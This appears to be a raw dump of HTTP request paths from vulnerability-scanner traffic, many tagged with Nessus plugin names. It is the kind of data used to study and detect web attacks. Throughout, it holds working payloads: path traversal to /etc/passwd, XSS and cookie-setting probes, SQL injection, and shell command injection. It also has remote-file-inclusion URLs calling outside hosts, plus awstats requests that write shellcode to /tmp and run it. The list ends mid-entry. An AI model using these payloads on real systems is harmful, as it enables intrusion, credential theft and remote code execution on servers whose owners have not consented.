service/\n/top.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/examples/jsp/jsp2/el/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/ao22ww7y.php?<script>document.cookie=\"testqppc=8767;\"</script>\n/phpmyadmin/showcat.php?cat=1'\n/edv3mapy.fts?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/help.php?q=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/javascript/signoff.exe\n/esmozg5d.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/phpmyadmin/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q75275559&frm_user=&scr_height=&scr_width=\n/examples/jsp/jsp2/el/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/examples/jsp/jsp2/el/minis.php?month=../../../../../../etc/passwd\n/0u75ldxq.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\\x0auname >q85389539 #\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+6f+61+64+4c+69+62+72+61+72+79+41+00+00+00+00+47+65+74+50+72+6f+63+41+64+64++>>ctdn\n/examples/jsp/checkbox/index.php?page=/etc/passwd\\x00\n/jackrabbit/search.jsp?q=%\"<script>alert(1332010405)</script>\n/help.php?q=\"del\\x0bq87717318&rem\\x0b\n/javascript/bottom.exe\n/40;15531264/\n/manager/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/x2gyorli.cfc?<script>document.cookie=\"testwhac=3130;\"</script>\n/jabgb-xss/\n/help.php?q=\"&del\\x0bq16289629&rem\\x0b\n/main.php?logout=\"rm\\x0bq77294234&rem\\x0b\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/luygekj.jsp\\x00\n/windows admin scripting little black book/\n/3j8echh0.nsf?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/l752x1ry.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/hjdzm96v.fts?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/manager/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/6wb70v0b.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/lmw4r201.jsp?<script>document.cookie=\"testwews=8477;\"</script>\n/libpam-passwdqc/\n/examples/servlets/servlet/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/examples/jsp/error/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jawtayfo]));die;/*\n/examples/jsp/checkbox/core/api.php?t_path_core=/etc/passwd\\x00\n/scripts/calendar.php?month=' union select 1,1,'1331908724','calendarix_month_sql_injection.nasl',1 #\n/jujgxwav.dll?<script>document.cookie=\"testknim=9383;\"</script>\n/fa8p8lr8.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008327')</script>\n/0rufe52p.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/edit.jsp?page=user&editor=../../../install\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/169okeyj.idc?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/rpxyx07v.cgi?<script>document.cookie=\"testbnli=1975;\"</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/fcgi-bin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/recordings/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/manager/main.php?g2_itemid=../../../../../license\\x00\n/xlj7h65o.cfc?<script>document.cookie=\"testtbbe=856;\"</script>\n/examples/jsp/sessions/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/top.php?stuff=';uname\\x09>q97745414\\x09#\n/examples/jsp/num/ovlaunch.exe\n/examples/jsp/cal/a1disp3.cgi?/../../../../../../etc/passwd\n/top.php?stuff='&rm\\x09q46445966\\x09#\n/help.php?q=\"ping;-w;7000;-n;1;4.3.2.1&rem;\n/help.php?q=\"del\\x0cq43711515&rem\\x0c\n/scripts/wxrdqnkjuwmu.cfm\n/cacti/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/recordings/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/help.php?q='&rm q85582565 #\n/vac1l5vm.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/profil.php?id=1 <script>foo</script>\n/tukodz3j.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/smiles.exe\n/jw64yq8u.idc?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/examples/jsp/jsp2/el/admin/top.php?admindir=/etc/passwd\\x00\n/<script>document.cookie=\"testlwwz=718;\"</script>\n/examples/jsp/colors/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/0z575z74.pl?<script>document.cookie=\"testuhsv=9753;\"</script>\n/edzaia0i.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/fbpansgiuv;\"\n/examples/servlets/servlet/php.cgi?/etc/passwd\n/manager/way-board/way-board.cgi?db=/etc/passwd\\x00\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/no4ghqiguzhst?\n/top.php?stuff=\"sleep\\x0910\\x09#\n/examples/jsp/sessions/man-cgi?section=0&topic=ls;id\n/scripts/upgradev1.php\n/top.php?stuff=';del q26271527 #\n/help.php?q='&sleep 7 #\n/j4oqyvga.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/news.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/edv3mapy.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"rm\\x09q18952146\\x09#\n/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.96:8080/4dckqcc0acprbz?\n/examples/jsp/error/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/qb2xy9aw.htm?<script>cross_site_scripting.nasl</script>\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/swgnhpydbq0t??\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/iljyfcptvy0;'); function v\n/manager/cvslog.cgi?file=<script>window.alert</script>\n/cgibin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/h4bi26jd.cfc?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/examples/jsp/colors/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/fcgi-bin/.passwd\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1305074935,281030825,1,1,1,1,1--&blogid=1\n/examples/jsp/sessions/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/examples/jsp/jsp2/jspx/shoutbox.php?conf=../../../../../../../../etc/passwd\n/javascript/standalone.exe\n/recordings/misc/audio.php?recording=../version.inc\n/main.php?frm_daynight=q11885533&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php&frm_user=&scr_height=&scr_width=\n/conscripts_gifts/\n/macosxsshadmin/\n/confirmunsubscription.php?output=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/yver8r9o.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i7prbs22.htm?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/xmefwyizyj0;echo|awstats988250.txt\n/o1zj4u9v.nsf?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/newsletter_subscription/\n/main.php?stuff=&ver;>q26155749&rem;\n/scriptssearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/rcscript/\n/www/delivery/ac.php?bannerid=-1331908694+or+1=1+--+';passthru(base64_decode($_server[http_nessus_xtwhhzn9]));die;/*\n/o35zot2r.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/include/sql.php?include_path=/etc/passwd\\x00\n/a1disp3.cgi?/../../../../../../etc/passwd\n/javascript/ofbiz.exe\n/en-us/account/viewpage.php?file=/etc/passwd\n/6qbynt4f.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/search.jsp?q=%\"<script>alert(1331908793)</script>\n/javascript/.passwd.cc\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/txenjrxf3??&cmd=ls\n/examples/jsp/cal/rot13sj.cgi?/etc/passwd\n/examples/jsp/error/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/examples/jsp/error/data/fetch.php?page='\n/manual/images/?c=n;o=d\n/phpmyadmin/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/h21y8w52.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/onlinesubscription_off/\n/?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/aj3pf49c.htm?<script>document.cookie=\"testnofv=4170;\"</script>\n/manager/help.php?section='qualiteam_xcart_sql_xss.nasl\n/ju0u7kfo.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/examples/servlets/servlet/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\\x0auname >q48279772 #\n/fnwhrxyd.idc?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+74+49+6e+66+68+4e+74+53+65+54+50+ff+54+24+38+50+8d+4c+24+30+6a+04+51+6a++>>esbq\n/<script>document.cookie=\"testsixi=8451;\"</script>\n/javascript/create.exe\n/pageview postscript 2/\n/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>\n/cacti/pfdispaly.cgi?../../../../../../etc/passwd\n/help.php?q='&del q95359585 #\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/vir0v3xfc??&cmd=ls\n/3m5knyc4.exe?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/examples/jsp/sessions/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/8x6w469u.jspa?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/scripts/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/mv8wxfy9.x?<script>document.cookie=\"testrhbc=8184;\"</script>\n/cgi-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6194853687.tmp\n/javascript/errors.exe\n/scripts/wxrdqnkjuwmu.php3\n/examples/jsp/error/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/azcrfs8d.dll?<script>document.cookie=\"testjpdr=9205;\"</script>\n/eyscript/\n/u95h6ymu.asp?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/iajtej82.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=q23533621&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=\n/examples/jsp/cal/kb.cgi?view='&lang=en\n/phpmyadmin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/?<script>document.cookie=\"testttvs=7163;\"</script>\n/scripts/calendar.asp\n/main.php?stuff=\"\\x0auname\\x09>q48139983\\x09#\n/examples/jsp/num/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/examples/jsp/error/a1disp3.cgi?/../../../../../../etc/passwd\n/julie vegas fuckin' good/\n/manager/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/scripts/9pen4xzgztjn.asp\n/en-us/oie504mr.exe?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/index.php?req_path=http://xxxxxx./\n/fnwhrxyd.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0adel\\x09q45619595\\x09#\n/en-us/account/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/examples/jsp/colors/secure.php?cfgprogdir=/etc/passwd\\x00\n/examples/jsp/num/topic.php?tid='select\n/main.php?stuff=\"del,q37721326&rem,\n/iajtej82.jsp?<script>cross_site_scripting.nasl</script>\n/main.php?logout=;sleep 11 #\n/main.php?logout=del;q78779487&rem;\n/declaration_transcript/\n/examples/jsp/jsp2/jspx/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/help.php?q=\"del\\x0cq65994111&rem\\x0c\n/index.php?config[\"sipssys\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/text_descriptor/\n/scgi-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>\n/javascript/environ.exe\n/examples/jsp/error/story.pl?next=../../../../../etc/passwd\\x00\n/bridges/smf/logout.php?path_to_smf=../../images/yim.gif\\x00\n/azcrfs8d.cfc?<script>document.cookie=\"testjpdr=9205;\"</script>\n/i7prbs22.php?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/cgi-bin/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/admin/common/script.js.php\n/scs86g1p.pl?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/en-us/account/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/scripts/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/help.php?q=&uname\\x09>q66229534\\x09#\n/search.jsp?q=%\"<script>alert(1332008323)</script>\n/top.php?stuff=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/x2gyorli.x?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/d5a5renl.asp?<script>cross_site_scripting.nasl</script>\n/15_cscript/\n/scs86g1p.cfm?<script>document.cookie=\"testquyx=2820;\"</script>\n/dda2qr7j.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/index.php?chemin=../../../../../../..//etc\n/awstatstotals/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/examples/jsp/error/index.php?module=<script>foo</script>\n/examples/jsp/cal/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/zv8tv7h8.exe?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/vac1l5vm.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&ver\\x0c>q99238383&rem\\x0c\n/top.php?stuff=\"uname >q17133825 #\n/l752x1ry.jsp?<script>cross_site_scripting.nasl</script>\n/i7prbs22.cfc?<script>document.cookie=\"testjnre=7328;\"</script>\n/phpmyadmin/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/examples/jsp/checkbox/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/examples/servlets/servlet/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/bxnyrhmh.pl?<script>document.cookie=\"testmjct=1867;\"</script>\n/examples/jsp/num/config.php?returnpath=/etc/passwd\\x00\n/\">\\xd0\\xbe\\xd0\\xb1\\xd1\\x89\\xd0\\xb8\\xd0\\xb5</\n/pxagj7n7.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnt3f86c.aspx?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/scriptsearch/\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/whmch8ftkt7kv?\n/examples/jsp/cal/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/recordings/admin/top.php?admindir=/etc/passwd\\x00\n/yver8r9o.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/add_url.htm?node=<script>alert('xss')</script>\n/help.php?q='\\x0drm\\x09q63353886\\x09#\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,227272765 --\n/e9rx3ya4.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.pl?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/n9xlumt5.htm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/top.php?stuff=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/vjbrrppi.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/get32.exe\n/e9rx3ya4.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\";rm q31473843 #\n/examples/jsp/error/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/q703m78q.idc?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/admin/index.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls\n/m5103snj.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ttxssh2_100alpha1a/\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cgi\n/yver8r9o.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/jsp2/jspx/check_user_id.php?user_id=<script>foo</script>\n/javascript/course.exe\n/javascript/attachs.exe\n<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/examples/jsp/jsp2/el/story.pl?next=../../../../../etc/passwd\\x00\n/help.php?q=\"rm q43721567&rem \n/vmi8bb12.jsp?<script>document.cookie=\"testlerc=2575;\"</script>\n/help.php?q=\"rm q96673282 #\n/&#xc9;cole_management/\n/9kr0ih0v.cfc?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/servlets/servlet/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/top.php?stuff=\"&rm q94671165 #\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0305\\0374\\0211\\0340j\\0020pr\" >> /tmp/ysooqnjtxq0;echo|awstats141011.txt\n/examples/jsp/jsp2/el/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/scripts/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/javascript/ws.exe\n/javascript/testimonials.exe\n/main.php?logout=';rm q85646861 #\n/cgi-bin/direct.php?rf=/etc/passwd\\x00\n/miz4r5hz.exe?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/hjdzm96v.cfm?<script>document.cookie=\"testbyqe=7474;\"</script>\n/examples/jsp/colors/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/main.php?stuff=\\x0duname >q25597918 #\n/hrttz9fj.do?<script>document.cookie=\"testtbjy=7334;\"</script>\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=bxu7lpilh_rfymlzv\n/raanw4ia.html?<script>cross_site_scripting.nasl</script>\n/andromeda.php?q=s&sm=fi&s=<iframe src=javascript:alert(%27wvs-xss-magic-string-411605577506%27)></iframe>&x=9&y=7\n/javascript/document.cgi\n/news/include/createdb.php?langfile;=http://192.168.202.118:8080/2aibfaczmac8??\n/help.php?q=&uname >q16961241 #\n/netutils/findata.stm?user=<script>alert(document.cookie)</script>\n/javascript/thumbnail.exe\n/o35zot2r.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/index.php?string='\n/javascript/texts.exe\n/d5a5renl.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_oyo3tg_8]));die;/*\n/scripts/shop.plx/page=nessus313484155\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1668253961,0,0,0,0,0--\n/examples/jsp/checkbox/webplus?script=/../../../../etc/passwd\n/en-us/account/language.php?data_dir=/etc/passwd\\x00\n/htbin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/script/tick/test.php?path_to_code=http://192.168.202.96:8080/4dckqcc0acprbz?\n/mpcgi/gwweb.exe?help=bad-request\n/33y9gcqq.cfm?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/vhzmaia2.htm?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/en-us/account/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/cgi.cgi/.htpasswd\n/rbec2ohx.cgi?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats141360.txt\n/6n7aacgg.aspx?<script>cross_site_scripting.nasl</script>\n/main.php?logout=&ver\\xa0>q35833556&rem\\xa0\n/help.php?q=;del q13157688 #\n/examples/jsp/jsp2/jspx/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/index.php?id='\n/de3v2dd9.exe?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"del\\x0bq76374652&rem\\x0b\n/scripts/shop.plx/page=nessus1912976494\n/examples/jsp/sessions/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/x2gyorli.dll?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/javascript/encoder.exe\n/awstats/awstats.pl?migrate=|echo;/./tmp/rzemxyjqrg.sh;echo|awstats777737.txt\n/awardshomepage-description/\n/scripts/www/delivery/ac.php?bannerid=-5+or+1=1\n/recordings/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/ghswfouu.php?<script>document.cookie=\"testsqmm=5713;\"</script>\n/ywaxntrx.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\\x00\n/xfkun1ku.pl?<script>cross_site_scripting.nasl</script>\n/cgi-sys/testcgi.exe\n/top.php?stuff=\"&rm\\x0cq74447142&rem\\x0c\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,849156682645,4,5,6,7,8,9,10,11--\n/top.php?stuff=\"&uname\\x09>q52362944\\x09#\n/b4vng02k.mscgi?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/uc3w3bdi.pl?<script>document.cookie=\"testxllt=9940;\"</script>\n/vwmg565s.dll?<script>cross_site_scripting.nasl</script>\n/ghswfouu.nsf?<script>document.cookie=\"testsqmm=5713;\"</script>\n/jscript.php?my_ms[root]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/bzuf9ozq.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&ping,-w,9000,-n,1,1.2.3.4&rem,\n/main.php?logout=\"&rm\\x0bq42433487&rem\\x0b\n/top.php?stuff=\"ping -w 11000 -n 1 1.2.3.4|rem \n/zuihld5m.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7o5qp766.nsf?<script>cross_site_scripting.nasl</script>\n/?<script>document.cookie=\"testtpby=7052;\"</script>\n/cgi-bin/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/jnv890lt.jsp?<script>cross_site_scripting.nasl</script>\n/recordings/top.php?header=../../../../../../../../etc/passwd\n/t3af3tdz.fts?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/docs.php?doc=../jpgraph-1.12.1/docs/index\n/ybz5rz7a.exe?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>\n/examples/jsp/error/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/<meta http-equiv=set-cookie content=\"testvowq=604\">\n/en-us/account/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/examples/jsp/checkbox/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/examples/jsp/num/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/scripts/c0kha6w3apd3.pl\n/top.php?stuff=&rm;q36796118&rem;\n/examples/jsp/jsp2/jspx/index.php?act=arcade&do=stats&gameid=1'\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 663157054,2,24321334,4,5,6,7,8,9,0,1,2,3 --\n/scripts/index.php?id=9_8hm4y9d6'\n/zln2hm2z.php3?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/jsp/jsp2/el/faxsurvey?cat /etc/passwd\n/starnet/addons/slideshow_full.php?album_name='311794161\n/t_scriptsentry/\n/examples/jsp/checkbox/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/help.php?q=ver >q53916315&rem \n/j734qobz.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/external_script/\n/help.php?q=\"&rm;q51857139&rem;\n/help.php?q=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/ygkjkngd.htm?<script>document.cookie=\"testnago=4518;\"</script>\n/examples/jsp/jsp2/el/source?v=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff='&uname\\x09#\n/examples/jsp/jsp2/el/index.php?module=<script>foo</script>\n/examples/jsp/colors/fxm.exe\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908881','5'--\n/pbserver/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/x2gyorli.exe?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/u8yiqilu.dll?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/fa8p8lr8.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/modules/jinzora/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/jw64yq8u.exe?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/cgis/testcgi.exe\n/fulldescription/\n/user.php?caselist[bad_file.txt][path]=http://192.168.202.118:8080/zz5thkvtmlgl?&command=cat /etc/passwd\n/javascript/sign.exe\n/[seccheck]/..%5c..%5c../ext.ini\n/examples/jsp/checkbox/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/examples/jsp/checkbox/zpanel.php?page=/etc/passwd\\x00\n/d765w06j.exe?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/hlgncmwqwx0;').\"]=1\n/javascript/reverted.exe\n/top.php?stuff=\"ver\\x0c>q31638645&rem\\x0c\n/wintelunixapplescriptmacos-/\n/examples/jsp/jsp2/jspx/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/noscript_button/\n/webid/iiswebagentif.dll?postdata=\"><script>foo</script>\n/javascript/attach.exe\n/mpcgi/testcgi.exe\n/main.php?logout=\";rm q56278633 #\n/ydexw8by.pl?<script>document.cookie=\"testulex=4996;\"</script>\n/javascript/source.exe\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008327')</script>\n/help.php?q=|ping;-w;8000;-n;1;1.2.3.4|rem;\n/examples/jsp/sessions/admin/configset.php?settings_dir=/etc/passwd\\x00\n/5o9zq43e.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.dll?<script>cross_site_scripting.nasl</script>\n/3hlysl2x.kspx?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/sam acura el burnout 17'/\n/examples/jsp/colors/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/examples/servlets/servlet/source?v=../../../../../../../../../../etc/passwd\\x00\n/cacti/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/n1afe1y6.pl?<img 